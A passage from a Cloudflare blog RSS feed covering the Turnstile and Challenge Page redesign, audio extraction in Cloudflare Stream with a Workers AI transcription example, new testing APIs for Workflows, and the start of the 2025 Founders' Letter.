      </a>
    </div>
    <p>What initially looked like small visual tweaks such as padding adjustments or alignment changes quickly revealed a much bigger challenge: internationalization.</p><p>Once translations were available, we had to ensure that content remained readable and usable across 38 languages and 16 different UI states. Text length variability alone required careful design decisions. Some translations can be 30 to 300 percent longer than English. A short English string like “Stuck?” becomes “Tidak bisa melanjutkan?” in Indonesian or “Es geht nicht weiter?” in German, dramatically changing layout requirements.</p><p>Right-to-left language support added another layer of complexity. Supporting Arabic, Persian or Farsi, and Hebrew meant more than flipping text direction. Entire layouts had to be mirrored, including alignment, navigation patterns, directional icons, and animation flows. Many of these elements are implicitly designed with left-to-right assumptions, so we had to revisit those decisions and make them truly bidirectional.</p><p>Ordered lists also required special care. Not every culture uses the Western 1, 2, 3 numbering system, and hardcoding numeric sequences can make interfaces feel foreign or incorrect. We leaned on locale-aware numbering and fully translatable list formats to ensure ordering felt natural and culturally appropriate in every language.</p>
    <div>
      <h4><b>Building confidence through testing</b></h4>
      <a href="#building-confidence-through-testing">
        
      </a>
    </div>
    <p>As we started listing action points in feedback reports, correctness became even more critical. Every action needed to render properly, trigger the right flow, and behave consistently across states, languages, and edge cases.</p><p>To get there, we invested heavily in testing. Unit tests helped us validate logic in isolation, while end-to-end tests ensured that new states and languages worked as expected in real scenarios. This testing foundation gave us confidence to iterate safely, prevented regressions, and ensured that feedback reports remained reliable and actionable for users.</p>
    <div>
      <h4><b>The outcome</b></h4>
      <a href="#the-outcome">
        
      </a>
    </div>
    <p>What began as a set of technical constraints turned into an opportunity to build a more robust, inclusive, and well-tested UI system. Working with fewer abstractions and closer to the browser primitives forced us to rethink assumptions, improve our internationalization strategy, and raise the overall quality bar.</p><p>The result is not just a solution that works, but one we trust. And that trust is what allows us to keep improving, even when centering a div turns out to be the easy part.</p>
    <div>
      <h2>Part 3: The impact</h2>
      <a href="#part-3-the-impact">
        
      </a>
    </div>
    <p>Designing for billions of people is a responsibility we take seriously. At this scale, it is essential to leverage measurable data to tell us the real impact of our design choices. As we prepare to roll out these changes, we are focusing on <b>five key metrics</b> that will tell us if we’ve truly succeeded in making the Internet’s most-seen UI more human.</p>
    <div>
      <h4><b>1. Challenge Completion Rate</b></h4>
      <a href="#1-challenge-completion-rate">
        
      </a>
    </div>
    <p>Our primary north star is the <b>Challenge Solve Rate: </b>the percentage of issued challenges that are successfully completed. By moving away from technical jargon like "intermediary caching" and toward simple, actionable labels like "Incorrect device time," we expect a significant uptick in CSR. A higher CSR doesn't mean we're being easier on bots; it means we’re removing the hurdles that were accidentally tripping up legitimate human users.</p>
    <div>
      <h4><b>2. Time to Complete</b></h4>
      <a href="#2-time-to-complete">
        
      </a>
    </div>
    <p>Every second a user spends on a challenge page is a second they aren't getting the information that they need. Our research showed that users were often paralyzed by choice when seeing a wall of red text. With our new scannable, neutral-color design, we are tracking <b>Time to Complete</b> to ensure users can identify and resolve issues in seconds rather than minutes.</p>
    <div>
      <h4><b>3. Abandonment Rate Changes</b></h4>
      <a href="#3-abandonment-rate-changes">
        
      </a>
    </div>
    <p>In the past, our liberal use of "saturated red" caused a visceral reaction: users felt they had failed and simply gave up. By reserving red only for icons and using a unified architecture, we aim to reduce Abandonment Rates. We want users to feel empowered to click Troubleshoot rather than feeling powerless and clicking away.</p>
    <div>
      <h4><b>4. Support Ticket Volume</b></h4>
      <a href="#4-support-ticket-volume">
        
      </a>
    </div>
    <p>One of the bigger shifts from a product perspective is our new Troubleshooting Modal. By providing clear, numbered steps directly within the widget, we are building self-service support into the UI. We expect this to result in a measurable decrease in support ticket volume for both our customers and our own internal teams.</p>
    <div>
      <h4><b>5. Social Sentiment</b></h4>
      <a href="#5-social-sentiment">
        
      </a>
    </div>
    <p>We know that security challenges are rarely loved, but they shouldn't be hated because they are confusing. We are monitoring <b>Social Sentiment</b> across community forums, feedback reports, and social channels to see if the conversation shifts from "this widget is broken" to "I had an issue, but I fixed it".</p><p>As a Product Manager, my goal is often invisible security — the best challenge is the one the user never sees. But when a challenge <i>must</i> be seen, it should be an assistant, not a bouncer. This redesign proves that <b>AAA accessibility</b> and <b>high-security standards</b> aren't in competition; they are two sides of the same coin. By unifying the architecture of Turnstile and Challenge Pages, we’ve built a foundation that allows us to iterate faster and protect the Internet more humanely than ever before.</p>
    <div>
      <h2>Looking ahead</h2>
      <a href="#looking-ahead">
        
      </a>
    </div>
    <p>This redesign is a foundation, not a finish line.</p><p>We're continuing to monitor how users interact with the new experience, and we're committed to iterating based on what we learn. The feedback mechanisms we've built into the new design — the ones that actually help users troubleshoot, rather than just asking them to report problems — will give us richer insights than we've ever had before.</p><p>We're also watching how the security landscape evolves. As bot attacks grow more sophisticated, and as AI continues to blur the line between human and automated behavior, the challenge of verification will only get harder. Our job is to stay ahead — to keep improving security without making the human experience worse.</p><p>If you encounter the new Turnstile or Challenge Pages and have feedback, we want to hear it. Reach out through our <a href="https://community.cloudflare.com/"><u>community forums</u></a> or use the feedback mechanisms built into the experience itself.</p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[Turnstile]]></category>
            <category><![CDATA[Challenge Page]]></category>
            <category><![CDATA[Design]]></category>
            <category><![CDATA[Product Design]]></category>
            <category><![CDATA[User Research]]></category>
            <category><![CDATA[Bots]]></category>
            <category><![CDATA[Bot Management]]></category>
            <category><![CDATA[WAF]]></category>
            <category><![CDATA[Engineering]]></category>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[Accessibility]]></category>
            <guid isPermaLink="false">19fiiQAG0XsaS9p0daOBus</guid>
            <dc:creator>Leo Bacevicius</dc:creator>
            <dc:creator>Ana Foppa</dc:creator>
            <dc:creator>Marina Elmore</dc:creator>
        </item>
        <item>
            <title><![CDATA[Extract audio from your videos with Cloudflare Stream]]></title>
            <link>https://blog.cloudflare.com/extract-audio-from-your-videos-with-cloudflare-stream/</link>
            <pubDate>Thu, 06 Nov 2025 14:00:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare Stream provides a unified platform for video storage, encoding, and delivery. We are now enabling developers to seamlessly extract audio from videos. ]]></description>
            <content:encoded><![CDATA[ <p></p><p>Cloudflare Stream loves video. But we know not every workflow needs the full picture, and the popularity of podcasts highlights how compelling stand-alone audio can be. For developers, processing a video just to access audio is slow, costly, and complex. </p><p>What makes video so expensive? A video file is a dense stack of high-resolution images, stitched together over time. As such, it is not just “one file” —  it’s a container of high-dimensional data such as frames per second, resolution, codecs. Analyzing video means traversing time  resolution  frame rate.</p>
    <div>
      <h2>Why audio extraction</h2>
      <a href="#why-audio-extraction">
        
      </a>
    </div>
    <p>By comparison, an audio file is far simpler. If an audio file consists of only one channel, it is defined as a single waveform. The technical characteristics of this waveform are defined by the sample rate (the number of audio samples taken per second), and the bit depth (the precision of each sample).</p><p>With the rise of computationally intensive AI inference pipelines, many of our customers want to perform downstream workflows that require only analyzing the audio. For example:</p><ul><li><p><b>Power AI and Machine Learning:</b> In addition to translation and transcription, you can feed the audio into Voice-to-Text models for speech recognition or analysis, or AI-powered summaries.</p></li><li><p><b>Improve content moderation:</b> Analyze the audio within your videos to ensure the content is safe and compliant.</p></li></ul><p>Using video data in such cases is expensive and unnecessary. </p><p>That’s why we’re introducing audio extraction. Through this feature, with just a single API call or click in the dashboard, you can now extract a lightweight M4A audio track from any video.</p><p>We’re introducing two flexible methods to extract audio from your videos. </p>
    <div>
      <h3>1. On-the-Fly audio extraction through Media Transformations</h3>
      <a href="#1-on-the-fly-audio-extraction-through-media-transformations">
        
      </a>
    </div>
    <p><a href="https://developers.cloudflare.com/stream/transform-videos/"><u>Media Transformations</u></a> is perfect for processing and transforming short-form videos, like social media clips, that you store anywhere you'd like. It works by fetching your media directly from its source, optimizing it at our edge, and delivering it efficiently. </p><p>We extended this workflow to include audio. By simply adding <code>mode=audio</code> to the transformation URL, you can now extract audio on-the-fly from a video file stored anywhere.</p><p>Once <a href="https://developers.cloudflare.com/stream/transform-videos/#getting-started"><u>Media Transformations is enabled for your domain</u></a>, you can extract audio from any source video. You can even clip specific sections by specifying <code>time</code> and <code>duration</code>.</p><p>For example:</p>
            <pre><code>https://example.com/cdn-cgi/media/mode=audio,time=5s,duration=10s/&lt;SOURCE-VIDEO&gt;</code></pre>
            <p>The above request generates a 10 second M4A audio clip from the source video, beginning at the 5-second mark. You can learn more about setup and other options in the <a href="https://developers.cloudflare.com/stream/transform-videos/"><u>Media Transformations documentation</u></a>. </p>
    <div>
      <h3>2. Audio downloads</h3>
      <a href="#2-audio-downloads">
        
      </a>
    </div>
    <p>You can now download the audio track directly for any content that you manage within Stream. Alongside the ability to generate a downloadable MP4 for offline viewing, you can also now create and store a persistent M4A audio file.</p>
    <div>
      <h2>Workers AI demo</h2>
      <a href="#workers-ai-demo">
        
      </a>
    </div>
    <p>Here, you can see a sample piece of code that demonstrates how to use Media Transformations with one of Cloudflare’s own products —  Workers AI. The following code creates a two-step process: first transcribing the video’s audio to English, then translating it into Spanish.</p>
            <pre><code>export default {
 async fetch(request, env, ctx) {


   // 1. Use Media Transformations to fetch only the audio track
   const res = await fetch( "https://blog.cloudflare.com/cdn-cgi/media/mode=audio/https://pub-d9fcbc1abcd244c1821f38b99017347f.r2.dev/announcing-audio-mode.mp4" );
   const blob = await res.arrayBuffer();


   // 2. Transcribe the audio to text using Whisper
   const transcript_response = await env.AI.run(
     "@cf/openai/whisper-large-v3-turbo",
     {
       audio: base64Encode(blob), // A base64 encoded string is required by @cf/openai/whisper-large-v3-turbo
     }
   );


   // Check if transcription was successful and text exists
   if (!transcript_response.text) {
       return Response.json({ error: "Failed to transcribe audio." }, { status: 500 });
   }


   // 3. Translate the transcribed text using the M2M100 model
   const translation_response = await env.AI.run(
     '@cf/meta/m2m100-1.2b',
     {
       text: transcript_response.text,
       source_lang: 'en', // The source language (English)
       target_lang: 'es'  // The target language (Spanish)
     }
   );


   // 4. Return both the original transcription and the translation
    return Response.json({
        transcription: transcript_response.text,
        translation: translation_response.translated_text
    });


 }
};


export function base64Encode(buf) {
 let string = '';
 (new Uint8Array(buf)).forEach(
   (byte) =&gt; { string += String.fromCharCode(byte) }
 )
 return btoa(string)
}</code></pre>
            <p>After running, the worker returns a clean JSON response. Shown below is a snippet of the transcribed and then translated response the worker returned.</p><p>Transcription:</p>
            <pre><code>{
  "transcription": "I'm excited to announce that Media Transformations from Cloudflare has added audio-only mode. Now you can quickly extract and deliver just the audio from your short form video. And from there, you can transcribe it or summarize it on Worker's AI or run moderation or inference tasks easily.",
  "translation": "Estoy encantado de anunciar que Media Transformations de Cloudflare ha añadido el modo solo de audio. Ahora puede extraer y entregar rápidamente sólo el audio de su vídeo de forma corta. Y desde allí, puede transcribirlo o resumirlo en la IA de Worker o ejecutar tareas de moderación o inferencia fácilmente."
}</code></pre>
            
    <div>
      <h2>Technical details</h2>
      <a href="#technical-details">
        
      </a>
    </div>
    <p>As a summer intern on the Stream team, I worked on shipping this long-requested feature. My first step was to understand the complex architecture of Stream’s media pipelines.</p><p>When a video is processed by Stream, it can follow one of two paths. The first is our video-on-demand (VOD) pipeline, which handles videos directly uploaded to Stream. It generates and stores a set of encoded video segments for adaptive bitrate streaming that can be streamed via HLS/DASH. The other path is our on-the-fly-encoding (or OTFE) pipeline, that drives the Stream Live and Media Transformations service. Instead of pre-processing and storing files, OTFE fetches media from a customer’s own website and performs transformations at the edge.</p><p>My project involved extending both of these pipelines to support audio extraction.</p>
    <div>
      <h3>OTFE pipeline</h3>
      <a href="#otfe-pipeline">
        
      </a>
    </div>
    <p>The OTFE pipeline is designed for real-time operations. The existing flow was engineered for visual tasks. When a customer with Media Transformations enabled makes a request on their own website, it’s routed to our edge servers, which acts as the entry point. The request is then validated, and per the user’s request, OTFE would fetch the video and generate a resized version or a still-frame thumbnail.</p><p>In order to support audio-only extraction, I built upon our existing workflow to add a new mode. This involved:</p><ol><li><p>Extending the validation logic: Specifically for audio, a crucial validation step was to verify that the source video contained an audio track before attempting extraction. This was in addition to pre-existing validation steps that ensure the requested URL was correctly formatted. </p></li><li><p>Building a new transformation handler: This was the core of my project. I built a new handler within the OTFE platform that specifically discarded the visual tracks in order to deliver a high-quality M4A file.
</p></li></ol>
    <div>
      <h3>VOD pipeline</h3>
      <a href="#vod-pipeline">
        
      </a>
    </div>
    <p>Similar to my work on OTFE, this project involved extending our current MP4 downloads workflow to audio-only, M4A downloads. This presented a series of interesting technical decisions. </p><p>The typical flow for creating a video download begins with a POST request to our main API layer, which handles authentication and validation, and creates a corresponding database record. Which then enqueues a job in our asynchronous queue where workers perform the processing task. To enable audio downloads for VOD, I introduced new, type-specific API endpoints (<code>POST /downloads/{type}</code>) while preserving the legacy <code>POST /downloads </code>route as an alias for creating downloads of the default, or video, download type. This ensured full backward compatibility.</p><p>The core work, of creating a download, is performed by our asynchronous queue. Which included:</p><ul><li><p>Adding logic to the consumer to detect the new audio download type</p></li><li><p>Pulling the ffmpeg template we define in our API layer to properly encode the audio stream into a high-quality M4A container</p></li></ul><p>By extending each component of this pipeline– from the API routes to the media processing commands– I was able to deliver a new, highly-requested feature that unlocks audio-centric workflows for our customers!
</p>
    <div>
      <h2>Dash screenshots</h2>
      <a href="#dash-screenshots">
        
      </a>
    </div>
    <p>We’re excited to announce that this feature is also available in the Stream dashboard. Simply navigate to any of your videos, and you’ll find the option to download the video or just the audio.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1DFBl200Npv24UfTbOBs5T/36229af550bb43305b0775a13e21e232/image5.png" />
          </figure><p>Once the download is ready, you will see the URL for the file, along with the option to disable it.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1vyRvNfraFUHyZs0vz75uC/55471ea8700cec1b44932e81d89dd47d/image4.png" />
          </figure>
    <div>
      <h2>That’s a wrap</h2>
      <a href="#thats-a-wrap">
        
      </a>
    </div>
    <p>This project addressed a long-standing customer need, providing a simpler way to work with audio from video. I’m truly grateful for this entire journey, from understanding the problem to shipping the solution, and especially for the mentorship and guidance I received from my team along the way. We are excited to see how developers use this new capability to build more efficient and exciting applications on Cloudflare Stream.</p><p>You can try the audio extraction feature by <a href="https://dash.cloudflare.com"><u>uploading a video to Stream</u></a> or using the API! If you're interested in tackling these kinds of technical challenges yourself, explore our <a href="https://www.cloudflare.com/careers/early-talent/?cf_target_id=97C555BF0DA9E4427F470C0134F7E2C9"><u>internship and early talent programs</u></a> to start your own journey.</p> ]]></content:encoded>
            <category><![CDATA[Internship Experience]]></category>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[Cloudflare Stream]]></category>
            <guid isPermaLink="false">6OFTw2NxvBqw0G8cr7jogY</guid>
            <dc:creator>Pakhi Sinha</dc:creator>
        </item>
        <item>
            <title><![CDATA[Building a better testing experience for Workflows, our durable execution engine for multi-step applications]]></title>
            <link>https://blog.cloudflare.com/better-testing-for-workflows/</link>
            <pubDate>Tue, 04 Nov 2025 14:00:00 GMT</pubDate>
            <description><![CDATA[ End-to-end testing for Cloudflare Workflows was challenging. We're introducing first-class support for Workflows in cloudflare:test, enabling full introspection, mocking, and isolated, reliable tests for your most complex applications. ]]></description>
            <content:encoded><![CDATA[ <p></p><p><a href="https://www.cloudflare.com/developer-platform/products/workflows/"><u>Cloudflare Workflows</u></a> is our take on "Durable Execution." They provide a serverless engine, powered by the <a href="https://www.cloudflare.com/developer-platform/"><u>Cloudflare Developer Platform</u></a>, for building long-running, multi-step applications that persist through failures. When Workflows became <a href="https://blog.cloudflare.com/workflows-ga-production-ready-durable-execution/"><u>generally available</u></a> earlier this year, they allowed developers to orchestrate complex processes that would be difficult or impossible to manage with traditional stateless functions. Workflows handle state, retries, and long waits, allowing you to focus on your business logic.</p><p>However, complex orchestrations require robust testing to be reliable. To date, testing Workflows was a black-box process. Although you could test if a Workflow instance reached completion through an <code>await</code> to its status, there was no visibility into the intermediate steps. This made debugging really difficult. Did the payment processing step succeed? Did the confirmation email step receive the correct data? You couldn't be sure without inspecting external systems or logs. </p>
    <div>
      <h3>Why was this necessary?</h3>
      <a href="#why-was-this-necessary">
        
      </a>
    </div>
    <p>As developers ourselves, we understand the need to ensure reliable code, and we heard your feedback loud and clear: the developer experience for testing Workflows needed to be better.</p><p>The black box nature of testing was one part of the problem. Beyond that, though, the limited testing offered came at a high cost. If you added a workflow to your project, even if you weren't testing the workflow directly, you were required to disable isolated storage because we couldn't guarantee isolation between tests. Isolated storage is a vitest-pool-workers feature to guarantee that each test runs in a clean, predictable environment, free from the side effects of other tests. Being forced to have it disabled meant that state could leak between tests, leading to flaky, unpredictable, and hard-to-debug failures.</p><p>This created a difficult choice for developers building complex applications. If your project used <a href="https://www.cloudflare.com/developer-platform/products/workers/"><u>Workers</u></a>, <a href="https://www.cloudflare.com/developer-platform/products/durable-objects/"><u>Durable Objects</u></a>, and <a href="https://www.cloudflare.com/developer-platform/products/r2/"><u>R2</u></a> alongside Workflows, you had to either abandon isolated testing for your <i>entire project</i> or skip testing. This friction resulted in a poor testing experience, which in turn discouraged the adoption of Workflows. Solving this wasn't just an improvement, it was a critical <i>step</i> in making Workflows part of any well-tested Cloudflare application.</p>
    <div>
      <h3>Introducing isolated testing for Workflows</h3>
      <a href="#introducing-isolated-testing-for-workflows">
        
      </a>
    </div>
    <p>We're introducing a new set of APIs that enable comprehensive, granular, and isolated testing for your Workflows, all running locally and offline with <code>vitest-pool-workers</code>, our testing framework that supports running tests in the Workers runtime <code>workerd</code>. This enables fast, reliable, and cheap test runs that don't depend on a network connection.</p><p>They are available through the <code>cloudflare:test</code> module, with <code>@cloudflare/vitest-pool-workers</code> version <b>0.9.0</b> and above. The new test module provides two primary functions to introspect your Workflows:</p><ul><li><p><code>introspectWorkflowInstance</code>: useful for unit tests with known instance IDs</p></li><li><p><code>introspectWorkflow</code>: useful for integration tests where IDs are typically generated dynamically.</p></li></ul><p>Let's walk through a practical example.</p>
    <div>
      <h3>A practical example: testing a blog moderation workflow</h3>
      <a href="#a-practical-example-testing-a-blog-moderation-workflow">
        
      </a>
    </div>
    <p>Imagine a simple Workflow for moderating a blog. When a user submits a comment, the Workflow requests a review from workers-ai. Based on the violation score returned, it then waits for a moderator to approve or deny the comment. If approved, it calls a <code>step.do</code> to publish the comment via an external API.</p><p>Testing this without our new APIs would be impossible. You'd have no direct way to simulate the step’s outcomes and simulate the moderator's approval. Now, you can mock everything.</p><p>Here’s the test code using <code>introspectWorkflowInstance</code> with a known instance ID:</p>
            <pre><code>import { env, introspectWorkflowInstance } from "cloudflare:test";

it("should mock a an ambiguous score, approve comment and complete", async () =&gt; {
   // CONFIG
   await using instance = await introspectWorkflowInstance(
       env.MODERATOR,
       "my-workflow-instance-id-123"
   );
   await instance.modify(async (m) =&gt; {
       await m.mockStepResult({ name: "AI content scan" }, { violationScore: 50 });
       await m.mockEvent({ 
           type: "moderation-approval", 
           payload: { action: "approved" },
       });
       await m.mockStepResult({ name: "publish comment" }, { status: "published" });
   });

   await env.MODERATOR.create({ id: "my-workflow-instance-id-123" });
   
   // ASSERTIONS
   expect(await instance.waitForStepResult({ name: "AI content scan" })).toEqual(
       { violationScore: 50 }
   );
   expect(
       await instance.waitForStepResult({ name: "publish comment" })
   ).toEqual({ status: "published" });

   await expect(instance.waitForStatus("complete")).resolves.not.toThrow();
});</code></pre>
            <p>This test mocks the outcomes of steps that require external API calls, such as the 'AI content scan', which calls <a href="https://www.cloudflare.com/developer-platform/products/workers-ai/"><u>Workers AI</u></a>, and the 'publish comment' step, which calls an external blog API.</p><p>If the instance ID is not known, because you are either making a worker request that starts one/multiple Workflow instances with random generated ids, you can call <code>introspectWorkflow(env.MY_WORKFLOW)</code>. Here’s the test code for that scenario, where only one Workflow instance is created:</p>
            <pre><code>it("workflow mock a non-violation score and be successful", async () =&gt; {
   // CONFIG
   await using introspector = await introspectWorkflow(env.MODERATOR);
   await introspector.modifyAll(async (m) =&gt; {
       await m.disableSleeps();
       await m.mockStepResult({ name: "AI content scan" }, { violationScore: 0 });
   });

   await SELF.fetch(`https://mock-worker.local/moderate`);

   const instances = introspector.get();
   expect(instances.length).toBe(1);

   // ASSERTIONS
   const instance = instances[0];
   expect(await instance.waitForStepResult({ name: "AI content scan"  })).toEqual({ violationScore: 0 });
   await expect(instance.waitForStatus("complete")).resolves.not.toThrow();
});</code></pre>
            <p>Notice how in both examples we’re calling the introspectors with <code>await using</code> - this is the <a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Resource_management#the_using_and_await_using_declarations"><u>Explicit Resource Management</u></a> syntax from modern JavaScript. It is crucial here because when the introspector objects go out of scope at the end of the test, its disposal method is automatically called. This is how we ensure each test works with its own isolated storage.</p><p>The <code>modify</code> and <code>modifyAll</code> functions are the gateway to controlling instances. Inside its callback, you get access to a modifier object with methods to inject behavior such as mocking step outcomes, events and disabling sleeps.</p><p>You can find detailed documentation on the <a href="https://developers.cloudflare.com/workers/testing/vitest-integration/test-apis/#workflows"><u>Workers Cloudflare Docs</u></a>.</p><p><b>How we connected Vitest to the Workflows Engine</b></p><p>To understand the solution, you first need to understand the local architecture. When you run <code>wrangler dev,</code> your Workflows are powered by Miniflare, a simulator for testing Cloudflare Workers, and <code>workerd</code>. Each running workflow instance is backed by its own SQLite Durable Object, which we call the "Engine DO". This Engine DO is responsible for executing steps, persisting state, and managing the instance's lifecycle. It lives inside the local isolated Workers runtime.</p><p>Meanwhile, the Vitest test runner is a separate Node.js process living outside of <code>workerd</code>. This is why we have a Vitest custom pool that allows tests to run inside <code>workerd</code> called vitest-pool-workers. Vitest-pool-workers has a Runner Worker, which is a worker to run the tests with bindings to everything specified in the user wrangler.json file. This worker has access to the APIs under the “cloudflare:test” module. It communicates with Node.js through a special DO called Runner Object via WebSocket/RPC.</p><p>The first approach we considered was to use the test runner worker. In its current state, Runner worker has access to Workflow bindings from Workflows defined on the wrangler file. We considered also binding each Workflow's Engine DO namespace to this runner worker. This would give vitest-pool-workers direct access to the Engine DOs where it would be possible to directly call Engine methods. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3ptKRqwpfvK1dxY6T5Kuin/fbf92915b2d2a95542bf6bec8addd5ad/image1.png" />
          </figure><p>While promising, this approach would have required undesirable changes to the core of Miniflare and vitest-pool-workers, making it too invasive for this single feature. </p><p>Firstly, we would have needed to add a new <i>unsafe</i> field to Miniflare's Durable Objects. Its sole purpose would be to specify the service name of our Engines, preventing Miniflare from applying its default user prefix which would otherwise prevent the Durable Objects from being found.</p><p>Secondly, vitest-pool-workers would have been forced to bind every Engine DO from the Workflows in the project to its runner, even those not being tested. This would introduce unwanted bindings into the test environment, requiring an additional cleanup to ensure they were not exposed to the user's tests env.</p><p><b>The breakthrough</b></p><p>The solution is a combination of privileged local-only APIs and Remote Procedure Calls (RPC).</p><p>First, we added a set of <code>unsafe</code> functions to the <i>local</i> implementation of the Workflows binding, functions that are not available in the production environment. They act as a controlled access point, accessible from the test environment, allowing the test runner to get a stub to a specific Engine DO by providing its instance ID.</p><p>Once the test runner has this stub, it uses RPC to call specific, trusted methods on the Engine DO via a special <code>RpcTarget</code> called <code>WorkflowInstanceModifier</code>. Any class that extends <code>RpcTarget</code> has its objects replaced by a stub. Calling a method on this stub, in turn, makes an RPC back to the original object.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3AObAsJuBplii3aeqMw2bn/74b21880b09a293fef6f84de1ae1318e/image2.png" />
          </figure><p>This simpler approach is far less invasive because it's confined to the Workflows environment, which also ensures any future feature changes are safely isolated.</p><p><b>Introspecting Workflows with unknown IDs</b></p><p>When creating Workflows instances (either by <code>create()</code> or <code>createBatch()</code>) developers can provide a specific ID or have it automatically generated for them. This ID identifies the Workflow instance and is then used to create the associated Engine DO ID.</p><p>The logical starting point for implementation was <code>introspectWorkflowInstance(binding, instanceID)</code>, as the instance ID is known in advance. This allows us to generate the Engine DO ID required to identify the engine associated with that Workflow instance.</p><p>But often, one part of your application (like an HTTP endpoint) will create a Workflow instance with a randomly generated ID. How can we introspect an instance when we don't know its ID until after it's created?</p><p>The answer was to use a powerful feature of JavaScript: <code>Proxy</code> objects.</p><p>When you use <code>introspectWorkflow(binding)</code>, we wrap the Workflow binding in a Proxy. This proxy non-destructively intercepts all calls to the binding, specifically looking for <code>.create()</code> and <code>.createBatch()</code>. When your test triggers a workflow creation, the proxy inspects the call. It captures the instance ID — either one you provided or the random one generated — and immediately sets up the introspection on that ID, applying all the modifications you defined in the <code>modifyAll</code> call. The original creation call then proceeds as normal.</p>
            <pre><code>env[workflow] = new Proxy(env[workflow], {
  get(target, prop) {
    if (prop === "create") {
      return new Proxy(target.create, {
        async apply(_fn, _this, [opts = {}]) {

          // 1. Ensure an ID exists 
          const optsWithId = "id" in opts ? opts : { id: crypto.randomUUID(), ...opts };

          // 2. Apply test modifications before creation
          await introspectAndModifyInstance(optsWithId.id);

          // 3. Call the original 'create' method 
          return target.create(optsWithId);
        },
      });
    }

    // Same logic for createBatch()
  }
}</code></pre>
            <p>When the <code>await using</code> block from <code>introspectWorkflow()</code> finishes, or the <code>dispose()</code> method is called at the end of the test, the introspector is disposed of, and the proxy is removed, leaving the binding in its original state. It’s a low-impact approach that prioritizes developer experience and long-term maintainability.</p>
    <div>
      <h3>Get started with testing Workflows</h3>
      <a href="#get-started-with-testing-workflows">
        
      </a>
    </div>
    <p>Ready to add tests to your Workflows? Here’s how to get started:</p><ol><li><p><b>Update your dependencies:</b> Make sure you are using <code>@cloudflare/vitest-pool-workers</code> version <b>0.9.0 </b>or newer. Run the following command in your project: <code>npm install @cloudflare/vitest-pool-workers@latest</code></p></li><li><p><b>Configure your test environment:</b> If you're new to testing on Workers, follow our <a href="https://developers.cloudflare.com/workers/testing/vitest-integration/write-your-first-test/"><u>guide to write your first test</u></a>.</p></li></ol><p><b>Start writing tests</b>: Import <code>introspectWorkflowInstance</code> or <code>introspectWorkflow</code> from <code>cloudflare:test</code> in your test files and use the patterns shown in this post to mock, control, and assert on your Workflow's behavior. Also check out the official <a href="https://developers.cloudflare.com/workers/testing/vitest-integration/test-apis/#workflows"><u>API reference</u></a>.</p> ]]></content:encoded>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Internship Experience]]></category>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Workflows]]></category>
            <guid isPermaLink="false">5Kq3w0WQ8bFIvLmxsDpIjO</guid>
            <dc:creator>Olga Silva</dc:creator>
            <dc:creator>Mia Malden</dc:creator>
        </item>
        <item>
            <title><![CDATA[Cloudflare’s 2025 Annual Founders’ Letter]]></title>
            <link>https://blog.cloudflare.com/cloudflare-2025-annual-founders-letter/</link>
            <pubDate>Sun, 21 Sep 2025 18:00:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare launched 15 years ago. We like to celebrate our birthday by launching new products that give back to the Internet. But we've also been thinking a lot about what's changed on the Internet. ]]></description>
            <content:encoded><![CDATA[ <p></p><p>Cloudflare <a href="https://www.youtube.com/watch?v=XeKWeBw1R5A"><u>launched 15 years ago</u></a> this week. We like to celebrate our birthday by announcing new products and features that give back to the Internet, which we’ll do a lot of this week. But, on this occasion, we've also been thinking about what's changed on the Internet over the last 15 years and what has not.</p><p>With some things there's been clear progress: when we launched in 2010 less than 10 percent of the Internet was encrypted, today well over 95 percent is encrypted. We're proud of the <a href="https://blog.cloudflare.com/introducing-universal-ssl/"><u>role we played in making that happen</u></a>.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2MLknOh75r4KpCfiXTjQkw/b80baa01b75437f3b1da24be3ca9e209/Timeline_2_part.png" />
          </figure>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5xkR8gdKR1YO1tIr6rLOmv/7e848bbefa83db1078d7ffe35e2bcc51/2.png" />
          </figure><p>Some other areas have seen limited progress: IPv6 adoption has grown steadily but painfully slowly over the last 15 years, in <a href="https://blog.cloudflare.com/introducing-cloudflares-automatic-ipv6-gatewa/"><u>spite</u></a> <a href="https://blog.cloudflare.com/cloudflare-expanding-the-ipv6-web/"><u>of</u></a> <a href="https://blog.cloudflare.com/eliminating-the-last-reasons-to-not-enable-ipv6/"><u>our</u></a> <a href="https://blog.cloudflare.com/amazon-2bn-ipv4-tax-how-avoid-paying/"><u>efforts</u></a>. That's a problem because as IPv4 addresses have become scarce and expensive it’s held back new entrants and driven up the costs of things like networking and cloud computing.</p>
    <div>
      <h2>The Internet’s Business Model</h2>
      <a href="#the-internets-business-model">
        
      </a>
    </div>
    <p>Still other things have remained remarkably consistent: the basic business model of the Internet has for the last 15 years been the same — create compelling content, find a way to be discovered, and then generate value from the resulting traffic. Whether that was through ads or subscriptions or selling things or just the ego of knowing that someone is consuming what you created, traffic generation has been the engine that powered the Internet we know today.</p><p>Make no mistake, the Internet has never been free. There's always been a reward system that transferred value from consumers to creators and, in doing so, filled the Internet with content. Had the Internet not had that reward system it wouldn't be nearly as vibrant as it is today.</p><p>A bit of a trivia aside: why did Cloudflare never build an ad blocker <a href="https://www.answeroverflow.com/m/1123890164222144542"><u>despite many requests</u></a>? Because, as imperfect as they are, ads have been the only micropayment system that has worked at scale to encourage an open Internet while also compensating content creators for their work. Our mission is to help build a better Internet, and a core value is that we’re principled, so we weren’t going to hamper the Internet’s fundamental business model.</p>
    <div>
      <h2>Traffic ≠ Value</h2>
      <a href="#traffic-value">
        
      </a>
    </div>
